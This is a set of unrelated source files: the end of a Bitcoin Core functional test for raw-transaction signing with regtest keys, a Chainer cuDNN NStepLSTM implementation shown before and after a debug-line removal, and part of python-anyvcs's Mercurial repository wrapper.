1) The transaction has a complete set of signatures
2) No script verification error occurred"""
privKeys = ['cUeKHd5orzT3mz8P9pxyREHfsWtVfgsfDjiZZBcjUBAaGk1BTj7N', 'cVKpPfVKSJxKqVpE9awvXNWuLHCa5j5tiE7K6zbUSptFpTEtiFrA']
inputs = [
# Valid pay-to-pubkey scripts
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0,
'scriptPubKey': '76a91460baa0f494b38ce3c940dea67f3804dc52d1fb9488ac'},
{'txid': '83a4f6a6b73660e13ee6cb3c6063fa3759c50c9b7521d0536022961898f4fb02', 'vout': 0,
'scriptPubKey': '76a914669b857c03a5ed269d5d85a1ffac9ed5d663072788ac'},
]
outputs = {'mpLQjfK79b7CCV4VMJWEWAj5Mpx8Up5zxB': 0.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
rawTxSigned = self.nodes[0].signrawtransactionwithkey(rawTx, privKeys, inputs)
# 1) The transaction has a complete set of signatures
assert rawTxSigned['complete']
# 2) No script verification error occurred
assert 'errors' not in rawTxSigned
def test_with_lock_outputs(self):
"""Test correct error reporting when trying to sign a locked output"""
self.nodes[0].encryptwallet("password")
rawTx = '020000000156b958f78e3f24e0b2f4e4db1255426b0902027cb37e3ddadb52e37c3557dddb0000000000ffffffff01c0a6b929010000001600149a2ee8c77140a053f36018ac8124a6ececc1668a00000000'
assert_raises_rpc_error(-13, "Please enter the wallet passphrase with walletpassphrase first", self.nodes[0].signrawtransactionwithwallet, rawTx)
def script_verification_error_test(self):
"""Create and sign a raw transaction with valid (vin 0), invalid (vin 1) and one missing (vin 2) input script.
Expected results:
3) The transaction has no complete set of signatures
4) Two script verification errors occurred
5) Script verification errors have certain properties ("txid", "vout", "scriptSig", "sequence", "error")
6) The verification errors refer to the invalid (vin 1) and missing input (vin 2)"""
privKeys = ['cUeKHd5orzT3mz8P9pxyREHfsWtVfgsfDjiZZBcjUBAaGk1BTj7N']
inputs = [
# Valid pay-to-pubkey script
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0},
# Invalid script
{'txid': '5b8673686910442c644b1f4993d8f7753c7c8fcb5c87ee40d56eaeef25204547', 'vout': 7},
# Missing scriptPubKey
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 1},
]
scripts = [
# Valid pay-to-pubkey script
{'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0,
'scriptPubKey': '76a91460baa0f494b38ce3c940dea67f3804dc52d1fb9488ac'},
# Invalid script
{'txid': '5b8673686910442c644b1f4993d8f7753c7c8fcb5c87ee40d56eaeef25204547', 'vout': 7,
'scriptPubKey': 'badbadbadbad'}
]
outputs = {'mpLQjfK79b7CCV4VMJWEWAj5Mpx8Up5zxB': 0.1}
rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
# Make sure decoderawtransaction is at least marginally sane
decodedRawTx = self.nodes[0].decoderawtransaction(rawTx)
for i, inp in enumerate(inputs):
assert_equal(decodedRawTx["vin"][i]["txid"], inp["txid"])
assert_equal(decodedRawTx["vin"][i]["vout"], inp["vout"])
# Make sure decoderawtransaction throws if there is extra data
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, rawTx + "00")
rawTxSigned = self.nodes[0].signrawtransactionwithkey(rawTx, privKeys, scripts)
# 3) The transaction has no complete set of signatures
assert not rawTxSigned['complete']
# 4) Two script verification errors occurred
assert 'errors' in rawTxSigned
assert_equal(len(rawTxSigned['errors']), 2)
# 5) Script verification errors have certain properties
assert 'txid' in rawTxSigned['errors'][0]
assert 'vout' in rawTxSigned['errors'][0]
assert 'witness' in rawTxSigned['errors'][0]
assert 'scriptSig' in rawTxSigned['errors'][0]
assert 'sequence' in rawTxSigned['errors'][0]
assert 'error' in rawTxSigned['errors'][0]
# 6) The verification errors refer to the invalid (vin 1) and missing input (vin 2)
assert_equal(rawTxSigned['errors'][0]['txid'], inputs[1]['txid'])
assert_equal(rawTxSigned['errors'][0]['vout'], inputs[1]['vout'])
assert_equal(rawTxSigned['errors'][1]['txid'], inputs[2]['txid'])
assert_equal(rawTxSigned['errors'][1]['vout'], inputs[2]['vout'])
assert not rawTxSigned['errors'][0]['witness']
# Now test signing failure for transaction with input witnesses
p2wpkh_raw_tx = "01000000000102fff7f7881a8099afa6940d42d1e7f6362bec38171ea3edf433541db4e4ad969f00000000494830450221008b9d1dc26ba6a9cb62127b02742fa9d754cd3bebf337f7a55d114c8e5cdd30be022040529b194ba3f9281a99f2b1c0a19c0489bc22ede944ccf4ecbab4cc618ef3ed01eeffffffef51e1b804cc89d182d279655c3aa89e815b1b309fe287d9b2b55d57b90ec68a0100000000ffffffff02202cb206000000001976a9148280b37df378db99f66f85c95a783a76ac7a6d5988ac9093510d000000001976a9143bde42dbee7e4dbe6a21b2d50ce2f0167faa815988ac000247304402203609e17b84f6a7d30c80bfa610b5b4542f32a8a0d5447a12fb1366d7f01cc44a0220573a954c4518331561406f90300e8f3358f51928d43c212a8caed02de67eebee0121025476c2e83188368da1ff3e292e7acafcdb3566bb0ad253f62fc70f07aeee635711000000"
rawTxSigned = self.nodes[0].signrawtransactionwithwallet(p2wpkh_raw_tx)
# 7) The transaction has no complete set of signatures
assert not rawTxSigned['complete']
# 8) Two script verification errors occurred
assert 'errors' in rawTxSigned
assert_equal(len(rawTxSigned['errors']), 2)
# 9) Script verification errors have certain properties
assert 'txid' in rawTxSigned['errors'][0]
assert 'vout' in rawTxSigned['errors'][0]
assert 'witness' in rawTxSigned['errors'][0]
assert 'scriptSig' in rawTxSigned['errors'][0]
assert 'sequence' in rawTxSigned['errors'][0]
assert 'error' in rawTxSigned['errors'][0]
# Non-empty witness checked here
assert_equal(rawTxSigned['errors'][1]['witness'], ["304402203609e17b84f6a7d30c80bfa610b5b4542f32a8a0d5447a12fb1366d7f01cc44a0220573a954c4518331561406f90300e8f3358f51928d43c212a8caed02de67eebee01", "025476c2e83188368da1ff3e292e7acafcdb3566bb0ad253f62fc70f07aeee6357"])
assert not rawTxSigned['errors'][0]['witness']
def witness_script_test(self):
# Now test signing transaction to P2SH-P2WSH addresses without wallet
# Create a new P2SH-P2WSH 1-of-1 multisig address:
embedded_address = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())
embedded_privkey = self.nodes[1].dumpprivkey(embedded_address["address"])
p2sh_p2wsh_address = self.nodes[1].addmultisigaddress(1, [embedded_address["pubkey"]], "", "p2sh-segwit")
# send transaction to P2SH-P2WSH 1-of-1 multisig address
self.nodes[0].generate(101)
self.nodes[0].sendtoaddress(p2sh_p2wsh_address["address"], 49.999)
self.nodes[0].generate(1)
self.sync_all()
# Find the UTXO for the transaction node[1] should have received, check witnessScript matches
unspent_output = self.nodes[1].listunspent(0, 999999, [p2sh_p2wsh_address["address"]])[0]
assert_equal(unspent_output["witnessScript"], p2sh_p2wsh_address["redeemScript"])
p2sh_redeemScript = CScript([OP_0, sha256(hex_str_to_bytes(p2sh_p2wsh_address["redeemScript"]))])
assert_equal(unspent_output["redeemScript"], p2sh_redeemScript.hex())
# Now create and sign a transaction spending that output on node[0], which doesn't know the scripts or keys
spending_tx = self.nodes[0].createrawtransaction([unspent_output], {self.nodes[1].getnewaddress(): Decimal("49.998")})
spending_tx_signed = self.nodes[0].signrawtransactionwithkey(spending_tx, [embedded_privkey], [unspent_output])
# Check the signing completed successfully
assert 'complete' in spending_tx_signed
assert_equal(spending_tx_signed['complete'], True)
# Now test with P2PKH and P2PK scripts as the witnessScript
for tx_type in ['P2PKH', 'P2PK']: # these tests are order-independent
self.verify_txn_with_witness_script(tx_type)
def verify_txn_with_witness_script(self, tx_type):
self.log.info("Test with a {} script as the witnessScript".format(tx_type))
embedded_addr_info = self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress('', 'legacy'))
embedded_privkey = self.nodes[1].dumpprivkey(embedded_addr_info['address'])
witness_script = {
'P2PKH': embedded_addr_info['scriptPubKey'],
'P2PK': CScript([hex_str_to_bytes(embedded_addr_info['pubkey']), OP_CHECKSIG]).hex()
}.get(tx_type, "Invalid tx_type")
redeem_script = CScript([OP_0, sha256(check_script(witness_script))]).hex()
addr = script_to_p2sh(redeem_script)
script_pub_key = self.nodes[1].validateaddress(addr)['scriptPubKey']
# Fund that address
txid = self.nodes[0].sendtoaddress(addr, 10)
vout = find_vout_for_address(self.nodes[0], txid, addr)
self.nodes[0].generate(1)
# Now create and sign a transaction spending that output on node[0], which doesn't know the scripts or keys
spending_tx = self.nodes[0].createrawtransaction([{'txid': txid, 'vout': vout}], {self.nodes[1].getnewaddress(): Decimal("9.999")})
spending_tx_signed = self.nodes[0].signrawtransactionwithkey(spending_tx, [embedded_privkey], [{'txid': txid, 'vout': vout, 'scriptPubKey': script_pub_key, 'redeemScript': redeem_script, 'witnessScript': witness_script, 'amount': 10}])
# Check the signing completed successfully
assert 'complete' in spending_tx_signed
assert_equal(spending_tx_signed['complete'], True)
self.nodes[0].sendrawtransaction(spending_tx_signed['hex'])
def run_test(self):
self.successful_signing_test()
self.script_verification_error_test()
self.witness_script_test()
self.test_with_lock_outputs()
if __name__ == '__main__':
SignRawTransactionsTest().main()
|
import numpy
from chainer import cuda
from chainer import function
from chainer.utils import type_check
if cuda.cudnn_enabled:
cudnn = cuda.cudnn
libcudnn = cuda.cudnn.cudnn
class PointerArray(object):
def __init__(self, lst, back_pointer):
self._value = numpy.array(lst, dtype=numpy.intp)
# Store back_pointer to prevent the GC removes the original variable
self._back_pointer = back_pointer
@property
def data(self):
return self._value.ctypes.data
def _make_tensor_descriptor_array(xs, rev=True):
"""Make an array of pointers denoting pointers of tensor descriptors.
"""
descs = []
for x in xs:
if x.ndim < 3:
if rev:
shape = (1,) * (3 - x.ndim) + x.shape
else:
shape = x.shape + (1,) * (3 - x.ndim)
x = x.reshape(shape)
desc = cudnn.create_tensor_nd_descriptor(x, rev=True)
descs.append(desc)
return PointerArray([d.value for d in descs], descs)
def _make_ptr_array(xs):
"""Make an array of pointers denoting pointers of ndarrays.
"""
return PointerArray([x.data.ptr for x in xs], xs)
class DropoutStates(object):
def __init__(self, states, desc):
self.states = states
self.desc = desc
@staticmethod
def create(handle, dropout, seed):
states = cudnn.create_dropout_states(handle)
desc = cudnn.create_dropout_descriptor(
handle, dropout, states.data.ptr, states.size, seed)
return DropoutStates(states, desc)
@staticmethod
def from_states(handle, states, dropout):
desc = cudnn.create_dropout_descriptor(handle, dropout, 0, 0, 0)
return DropoutStates(states, desc)
def _make_indices(batches):
pos = 0
inds = []
for b in batches[:-1]:
pos += b
inds.append(pos)
return inds
class NStepLSTM(function.Function):
def __init__(self, n_layers, batches, states, train=True):
self.n_layers = n_layers
self.train = train
self.states = states
self.batches = batches
def check_type_forward(self, in_types):
h_type, c_type, x_type, w_type, b_type = in_types
type_check.expect(
h_type.dtype == numpy.float32,
c_type.dtype == numpy.float32,
x_type.dtype == numpy.float32,
h_type.ndim == 3,
h_type.shape[0] == self.n_layers,
c_type.ndim == 3,
c_type.shape[0] == self.n_layers,
x_type.shape[0] == sum(self.batches),
# mini-batch size
h_type.shape[1] == c_type.shape[1],
# hidden size
h_type.shape[2] == c_type.shape[2],
h_type.shape[2] == x_type.shape[1],
w_type.ndim == 4,
w_type.shape[0] == self.n_layers,
w_type.shape[1] == 8,
h_type.shape[2] == w_type.shape[2],
h_type.shape[2] == w_type.shape[3],
b_type.ndim == 3,
b_type.shape[0] == self.n_layers,
b_type.shape[1] == 8,
h_type.shape[2] == b_type.shape[2],
)
def forward(self, inputs):
hx, cx, xs, ws, bs = inputs
length = len(self.batches)
n_units = hx.shape[2]
ys = cuda.cupy.empty_like(xs)
inds = _make_indices(self.batches)
x_list = cuda.cupy.split(xs, inds, 0)
# shape of h and c is (batch_size, n_layer, hidden_size) in Chainer
# but (hidden_size, batch_size, n_layer) in cuDNN
handle = cudnn.get_handle()
self.handle = handle
rnn_desc = cudnn.create_rnn_descriptor(
n_units, length, self.n_layers, self.states.desc,
libcudnn.CUDNN_LINEAR_INPUT, libcudnn.CUDNN_UNIDIRECTIONAL,
libcudnn.CUDNN_LSTM, libcudnn.CUDNN_DATA_FLOAT)
self.rnn_desc = rnn_desc
c_x_descs = _make_tensor_descriptor_array(x_list)
hx_desc = cudnn.create_tensor_nd_descriptor(hx, rev=True)
cx_desc = cudnn.create_tensor_nd_descriptor(cx, rev=True)
weights_size = libcudnn.getRNNParamsSize(
handle, rnn_desc.value, c_x_descs.data)
w = cuda.cupy.empty((weights_size // 4, 1, 1), dtype=numpy.float32)
w_desc = cudnn.create_filter_descriptor(w)
for layer in range(self.n_layers):
for lin_layer_id in range(8):
mat = cudnn.get_rnn_lin_layer_matrix_params(
handle, rnn_desc, layer, c_x_descs, w_desc, w,
lin_layer_id)
m = mat.reshape(mat.size)
m[...] = ws[layer, lin_layer_id].ravel()
bias = cudnn.get_rnn_lin_layer_bias_params(
handle, rnn_desc, layer, c_x_descs, w_desc, w,
lin_layer_id)
b = bias.reshape(bias.size)
b[...] = bs[layer, lin_layer_id]
self.w = w
self.w_desc = w_desc
y_list = cuda.cupy.split(ys, inds, 0)
c_y_descs = _make_tensor_descriptor_array(y_list)
hy = cuda.cupy.empty_like(hx)
cy = cuda.cupy.empty_like(cx)
hy_desc = cudnn.create_tensor_nd_descriptor(hy, rev=True)
cy_desc = cudnn.create_tensor_nd_descriptor(cy, rev=True)
work_size = libcudnn.getRNNWorkspaceSize(
handle, rnn_desc.value, c_x_descs.data)
workspace = cuda.cupy.empty((work_size,), dtype='b')
self.workspace = workspace
if not self.train:
libcudnn.RNNForwardInference(
handle, rnn_desc.value,
c_x_descs.data, xs.data.ptr, hx_desc.value, hx.data.ptr,
cx_desc.value, cx.data.ptr, w_desc.value, w.data.ptr,
c_y_descs.data, ys.data.ptr, hy_desc.value, hy.data.ptr,
cy_desc.value, cy.data.ptr, workspace.data.ptr, work_size)
else:
reserve_size = libcudnn.getRNNTrainingReserveSize(
handle, rnn_desc.value, c_x_descs.data)
self.reserve_space = cuda.cupy.empty((reserve_size,), dtype='b')
libcudnn.RNNForwardTraining(
handle, rnn_desc.value,
c_x_descs.data, xs.data.ptr, hx_desc.value, hx.data.ptr,
cx_desc.value, cx.data.ptr, w_desc.value, w.data.ptr,
c_y_descs.data, ys.data.ptr, hy_desc.value, hy.data.ptr,
cy_desc.value, cy.data.ptr,
workspace.data.ptr, work_size,
self.reserve_space.data.ptr, reserve_size)
self.c_y_descs = c_y_descs
self.ys = ys
self.c_x_descs = c_x_descs
cuda.to_cpu(hy)
return hy, cy, ys
def backward(self, inputs, grads):
hx, cx, xs, ws, bs = inputs
dhy, dcy, dys = grads
if dhy is None:
dhy = cuda.cupy.zeros_like(hx)
if dcy is None:
dcy = cuda.cupy.zeros_like(cx)
if dys is None:
#TODO
dys = cuda.cupy.zeros_like(xs)
inds = _make_indices(self.batches)
dxs = cuda.cupy.empty_like(xs)
dhx = cuda.cupy.empty_like(hx)
dcx = cuda.cupy.empty_like(cx)
hx_desc = cudnn.create_tensor_nd_descriptor(hx, rev=True)
cx_desc = cudnn.create_tensor_nd_descriptor(cx, rev=True)
dhy_desc = cudnn.create_tensor_nd_descriptor(dhy, rev=True)
dcy_desc = cudnn.create_tensor_nd_descriptor(dcy, rev=True)
dy_list = cuda.cupy.split(dys, inds, 0)
c_dy_descs = _make_tensor_descriptor_array(dy_list)
rnn_desc = self.rnn_desc
handle = self.handle
work_size = libcudnn.getRNNWorkspaceSize(
handle, rnn_desc.value, self.c_x_descs.data)
workspace = cuda.cupy.empty((work_size,), dtype='b')
dhx_desc = cudnn.create_tensor_nd_descriptor(dhx, rev=True)
dcx_desc = cudnn.create_tensor_nd_descriptor(dcx, rev=True)
dx_list = cuda.cupy.split(dxs, inds, 0)
c_dx_descs = _make_tensor_descriptor_array(dx_list)
libcudnn.RNNBackwardData(
handle, rnn_desc.value, self.c_y_descs.data, self.ys.data.ptr,
c_dy_descs.data, dys.data.ptr, dhy_desc.value, dhy.data.ptr,
dcy_desc.value, dcy.data.ptr, self.w_desc.value, self.w.data.ptr,
hx_desc.value, hx.data.ptr, cx_desc.value, cx.data.ptr,
c_dx_descs.data, dxs.data.ptr, dhx_desc.value, dhx.data.ptr,
dcx_desc.value, dcx.data.ptr, workspace.data.ptr, work_size,
self.reserve_space.data.ptr, self.reserve_space.size)
dw = cuda.cupy.zeros_like(self.w)
dw_desc = cudnn.create_tensor_nd_descriptor(dw)
libcudnn.RNNBackwardWeights(
handle, rnn_desc.value, self.c_x_descs.data, xs.data.ptr,
hx_desc.value, hx.data.ptr, self.c_y_descs.data, self.ys.data.ptr,
workspace.data.ptr, work_size, dw_desc.value, dw.data.ptr,
self.reserve_space.data.ptr, self.reserve_space.size)
dws = cuda.cupy.empty_like(ws)
dbs = cuda.cupy.empty_like(bs)
for layer in range(self.n_layers):
for lin_layer_id in range(8):
mat = cudnn.get_rnn_lin_layer_matrix_params(
handle, rnn_desc, layer, c_dx_descs, dw_desc, dw,
lin_layer_id)
v = dws[layer, lin_layer_id]
v = v.reshape(v.size)
v[:] = mat.ravel()
bias = cudnn.get_rnn_lin_layer_bias_params(
handle, rnn_desc, layer, c_dx_descs, dw_desc, dw,
lin_layer_id)
v = dbs[layer, lin_layer_id]
v = v.reshape(v.size)
v[:] = bias.ravel()
return dhx, dcx, dxs, dws, dbs
Remove debug code
import numpy
from chainer import cuda
from chainer import function
from chainer.utils import type_check
if cuda.cudnn_enabled:
cudnn = cuda.cudnn
libcudnn = cuda.cudnn.cudnn
class PointerArray(object):
def __init__(self, lst, back_pointer):
self._value = numpy.array(lst, dtype=numpy.intp)
# Store back_pointer to prevent the GC removes the original variable
self._back_pointer = back_pointer
@property
def data(self):
return self._value.ctypes.data
def _make_tensor_descriptor_array(xs, rev=True):
"""Make an array of pointers denoting pointers of tensor descriptors.
"""
descs = []
for x in xs:
if x.ndim < 3:
if rev:
shape = (1,) * (3 - x.ndim) + x.shape
else:
shape = x.shape + (1,) * (3 - x.ndim)
x = x.reshape(shape)
desc = cudnn.create_tensor_nd_descriptor(x, rev=True)
descs.append(desc)
return PointerArray([d.value for d in descs], descs)
def _make_ptr_array(xs):
"""Make an array of pointers denoting pointers of ndarrays.
"""
return PointerArray([x.data.ptr for x in xs], xs)
class DropoutStates(object):
def __init__(self, states, desc):
self.states = states
self.desc = desc
@staticmethod
def create(handle, dropout, seed):
states = cudnn.create_dropout_states(handle)
desc = cudnn.create_dropout_descriptor(
handle, dropout, states.data.ptr, states.size, seed)
return DropoutStates(states, desc)
@staticmethod
def from_states(handle, states, dropout):
desc = cudnn.create_dropout_descriptor(handle, dropout, 0, 0, 0)
return DropoutStates(states, desc)
def _make_indices(batches):
pos = 0
inds = []
for b in batches[:-1]:
pos += b
inds.append(pos)
return inds
class NStepLSTM(function.Function):
def __init__(self, n_layers, batches, states, train=True):
self.n_layers = n_layers
self.train = train
self.states = states
self.batches = batches
def check_type_forward(self, in_types):
h_type, c_type, x_type, w_type, b_type = in_types
type_check.expect(
h_type.dtype == numpy.float32,
c_type.dtype == numpy.float32,
x_type.dtype == numpy.float32,
h_type.ndim == 3,
h_type.shape[0] == self.n_layers,
c_type.ndim == 3,
c_type.shape[0] == self.n_layers,
x_type.shape[0] == sum(self.batches),
# mini-batch size
h_type.shape[1] == c_type.shape[1],
# hidden size
h_type.shape[2] == c_type.shape[2],
h_type.shape[2] == x_type.shape[1],
w_type.ndim == 4,
w_type.shape[0] == self.n_layers,
w_type.shape[1] == 8,
h_type.shape[2] == w_type.shape[2],
h_type.shape[2] == w_type.shape[3],
b_type.ndim == 3,
b_type.shape[0] == self.n_layers,
b_type.shape[1] == 8,
h_type.shape[2] == b_type.shape[2],
)
def forward(self, inputs):
hx, cx, xs, ws, bs = inputs
length = len(self.batches)
n_units = hx.shape[2]
ys = cuda.cupy.empty_like(xs)
inds = _make_indices(self.batches)
x_list = cuda.cupy.split(xs, inds, 0)
# shape of h and c is (batch_size, n_layer, hidden_size) in Chainer
# but (hidden_size, batch_size, n_layer) in cuDNN
handle = cudnn.get_handle()
self.handle = handle
rnn_desc = cudnn.create_rnn_descriptor(
n_units, length, self.n_layers, self.states.desc,
libcudnn.CUDNN_LINEAR_INPUT, libcudnn.CUDNN_UNIDIRECTIONAL,
libcudnn.CUDNN_LSTM, libcudnn.CUDNN_DATA_FLOAT)
self.rnn_desc = rnn_desc
c_x_descs = _make_tensor_descriptor_array(x_list)
hx_desc = cudnn.create_tensor_nd_descriptor(hx, rev=True)
cx_desc = cudnn.create_tensor_nd_descriptor(cx, rev=True)
weights_size = libcudnn.getRNNParamsSize(
handle, rnn_desc.value, c_x_descs.data)
w = cuda.cupy.empty((weights_size // 4, 1, 1), dtype=numpy.float32)
w_desc = cudnn.create_filter_descriptor(w)
for layer in range(self.n_layers):
for lin_layer_id in range(8):
mat = cudnn.get_rnn_lin_layer_matrix_params(
handle, rnn_desc, layer, c_x_descs, w_desc, w,
lin_layer_id)
m = mat.reshape(mat.size)
m[...] = ws[layer, lin_layer_id].ravel()
bias = cudnn.get_rnn_lin_layer_bias_params(
handle, rnn_desc, layer, c_x_descs, w_desc, w,
lin_layer_id)
b = bias.reshape(bias.size)
b[...] = bs[layer, lin_layer_id]
self.w = w
self.w_desc = w_desc
y_list = cuda.cupy.split(ys, inds, 0)
c_y_descs = _make_tensor_descriptor_array(y_list)
hy = cuda.cupy.empty_like(hx)
cy = cuda.cupy.empty_like(cx)
hy_desc = cudnn.create_tensor_nd_descriptor(hy, rev=True)
cy_desc = cudnn.create_tensor_nd_descriptor(cy, rev=True)
work_size = libcudnn.getRNNWorkspaceSize(
handle, rnn_desc.value, c_x_descs.data)
workspace = cuda.cupy.empty((work_size,), dtype='b')
self.workspace = workspace
if not self.train:
libcudnn.RNNForwardInference(
handle, rnn_desc.value,
c_x_descs.data, xs.data.ptr, hx_desc.value, hx.data.ptr,
cx_desc.value, cx.data.ptr, w_desc.value, w.data.ptr,
c_y_descs.data, ys.data.ptr, hy_desc.value, hy.data.ptr,
cy_desc.value, cy.data.ptr, workspace.data.ptr, work_size)
else:
reserve_size = libcudnn.getRNNTrainingReserveSize(
handle, rnn_desc.value, c_x_descs.data)
self.reserve_space = cuda.cupy.empty((reserve_size,), dtype='b')
libcudnn.RNNForwardTraining(
handle, rnn_desc.value,
c_x_descs.data, xs.data.ptr, hx_desc.value, hx.data.ptr,
cx_desc.value, cx.data.ptr, w_desc.value, w.data.ptr,
c_y_descs.data, ys.data.ptr, hy_desc.value, hy.data.ptr,
cy_desc.value, cy.data.ptr,
workspace.data.ptr, work_size,
self.reserve_space.data.ptr, reserve_size)
self.c_y_descs = c_y_descs
self.ys = ys
self.c_x_descs = c_x_descs
return hy, cy, ys
def backward(self, inputs, grads):
hx, cx, xs, ws, bs = inputs
dhy, dcy, dys = grads
if dhy is None:
dhy = cuda.cupy.zeros_like(hx)
if dcy is None:
dcy = cuda.cupy.zeros_like(cx)
if dys is None:
#TODO
dys = cuda.cupy.zeros_like(xs)
inds = _make_indices(self.batches)
dxs = cuda.cupy.empty_like(xs)
dhx = cuda.cupy.empty_like(hx)
dcx = cuda.cupy.empty_like(cx)
hx_desc = cudnn.create_tensor_nd_descriptor(hx, rev=True)
cx_desc = cudnn.create_tensor_nd_descriptor(cx, rev=True)
dhy_desc = cudnn.create_tensor_nd_descriptor(dhy, rev=True)
dcy_desc = cudnn.create_tensor_nd_descriptor(dcy, rev=True)
dy_list = cuda.cupy.split(dys, inds, 0)
c_dy_descs = _make_tensor_descriptor_array(dy_list)
rnn_desc = self.rnn_desc
handle = self.handle
work_size = libcudnn.getRNNWorkspaceSize(
handle, rnn_desc.value, self.c_x_descs.data)
workspace = cuda.cupy.empty((work_size,), dtype='b')
dhx_desc = cudnn.create_tensor_nd_descriptor(dhx, rev=True)
dcx_desc = cudnn.create_tensor_nd_descriptor(dcx, rev=True)
dx_list = cuda.cupy.split(dxs, inds, 0)
c_dx_descs = _make_tensor_descriptor_array(dx_list)
libcudnn.RNNBackwardData(
handle, rnn_desc.value, self.c_y_descs.data, self.ys.data.ptr,
c_dy_descs.data, dys.data.ptr, dhy_desc.value, dhy.data.ptr,
dcy_desc.value, dcy.data.ptr, self.w_desc.value, self.w.data.ptr,
hx_desc.value, hx.data.ptr, cx_desc.value, cx.data.ptr,
c_dx_descs.data, dxs.data.ptr, dhx_desc.value, dhx.data.ptr,
dcx_desc.value, dcx.data.ptr, workspace.data.ptr, work_size,
self.reserve_space.data.ptr, self.reserve_space.size)
dw = cuda.cupy.zeros_like(self.w)
dw_desc = cudnn.create_tensor_nd_descriptor(dw)
libcudnn.RNNBackwardWeights(
handle, rnn_desc.value, self.c_x_descs.data, xs.data.ptr,
hx_desc.value, hx.data.ptr, self.c_y_descs.data, self.ys.data.ptr,
workspace.data.ptr, work_size, dw_desc.value, dw.data.ptr,
self.reserve_space.data.ptr, self.reserve_space.size)
dws = cuda.cupy.empty_like(ws)
dbs = cuda.cupy.empty_like(bs)
for layer in range(self.n_layers):
for lin_layer_id in range(8):
mat = cudnn.get_rnn_lin_layer_matrix_params(
handle, rnn_desc, layer, c_dx_descs, dw_desc, dw,
lin_layer_id)
v = dws[layer, lin_layer_id]
v = v.reshape(v.size)
v[:] = mat.ravel()
bias = cudnn.get_rnn_lin_layer_bias_params(
handle, rnn_desc, layer, c_dx_descs, dw_desc, dw,
lin_layer_id)
v = dbs[layer, lin_layer_id]
v = v.reshape(v.size)
v[:] = bias.ravel()
return dhx, dcx, dxs, dws, dbs
|
# Copyright 2013 Clemson University
#
# This file is part of python-anyvcs.
#
# python-anyvcs is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-anyvcs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with python-anyvcs. If not, see <http://www.gnu.org/licenses/>.
import datetime
import re
import subprocess
from common import *
HG = 'hg'
manifest_rx = re.compile(r'^(?P<mode>[0-7]{3}) (?P<type>.) (?P<name>.+)$')
parse_heads_rx = re.compile(r'^(?P<name>.+?)\s+(?P<rev>-?\d+):(?P<nodeid>[0-9a-f]+)', re.I)
bookmarks_rx = re.compile(r'^\s+(?:\*\s+)?(?P<name>.+?)\s+(?P<rev>\d+):(?P<nodeid>[0-9a-f]+)', re.I)
annotate_rx = re.compile(r'^(?P<author>.*)\s+(?P<rev>\d+):\s')
def parent_dirs(path):
ds = path.find('/')
while ds != -1:
yield path[:ds]
ds = path.find('/', ds + 1)
def parse_hgdate(datestr):
ts, tzoffset = datestr.split(None, 1)
date = datetime.datetime.fromtimestamp(float(ts))
return date.replace(tzinfo=UTCOffset(-int(tzoffset)/60))
class HgRepo(VCSRepo):
@classmethod
def create(cls, path):
cmd = [HG, 'init', path]
subprocess.check_call(cmd)
return cls(path)
@property
def private_path(self):
import os
path = os.path.join(self.path, '.hg', '.private')
try:
os.mkdir(path)
except OSError as e:
import errno
if e.errno != errno.EEXIST:
raise
return path
def _ls(self, rev, path, recursive=False, recursive_dirs=False,
directory=False):
forcedir = False
if path.endswith('/'):
forcedir = True
path = path.rstrip('/')
if path == '':
ltrim = 0
prefix = ''
else:
ltrim = len(path) + 1
prefix = path + '/'
cmd = [HG, 'manifest', '-v', '-r', rev]
output = self._command(cmd)
dirs = set()
exists = False
for line in output.splitlines():
m = manifest_rx.match(line)
assert m, 'unexpected output: ' + line
t, name = m.group('type', 'name')
if name.startswith(prefix) or (not forcedir and name == path):
if directory and name.startswith(prefix):
yield ('d', '')
return
exists = True
entry_name = name[ltrim:]
if '/' in entry_name:
p = parent_dirs(entry_name)
if not recursive:
d = p.next()
if d not in dirs:
dirs.add(d)
yield ('d', d)
continue
if recursive_dirs:
for d in p:
if d not in dirs:
dirs.add(d)
yield ('d', d)
yield (t, entry_name)
if not exists:
raise PathDoesNotExist(rev, path)
def ls(self, rev, path, recursive=False, recursive_dirs=False,
directory=False, report=()):
revstr = str(rev)
path = type(self).cleanPath(path)
if path == '':
if directory:
return [{'type':'d'}]
if True and 'commit' in report:
import tempfile
with tempfile.NamedTemporaryFile() as style:
style.write(
r"changeset = '{rev}\n{node}\n{files}\0'" '\n'
r"file = '{file|escape}\n'" '\n'
)
style.flush()
cmd = [HG, 'log', '--style', style.name, '-r', 'reverse(ancestors('+revstr+'))']
log = self._command(cmd).split('\0')
else:
log = None
results = []
for t, name in self._ls(revstr, path, recursive, recursive_dirs, directory):
entry = attrdict()
if name:
entry.name = name
if t == 'd':
entry.type = 'd'
elif t in ' *':
entry.type = 'f'
if 'executable' in report:
entry.executable = t == '*'
if 'size' in report:
entry.size = len(self._cat(revstr, name))
elif t == '@':
entry.type = 'l'
if 'target' in report:
entry.target = self._cat(revstr, name)
else:
assert False, 'unexpected output: ' + line
if 'commit' in report:
p = type(self).cleanPath(path + '/' + name)
if log is None:
cmd = [HG, 'log', '--template={node}', '-l1', '-r', 'reverse(ancestors('+revstr+'))', '--', p]
entry.commit = self._command(cmd)
else:
for logentry in log:
lines = logentry.splitlines()
found = False
for l in lines[2:]:
if l == p or l.startswith(p+'/'):
found = True
break
if found:
entry.commit = lines[1]
break
results.append(entry)
return results
def _cat(self, rev, path):
cmd = [HG, 'cat', '-r', rev, path]
return self._command(cmd)
def cat(self, rev, path):
path = type(self).cleanPath(path)
ls = self.ls(rev, path, directory=True)
assert len(ls) == 1
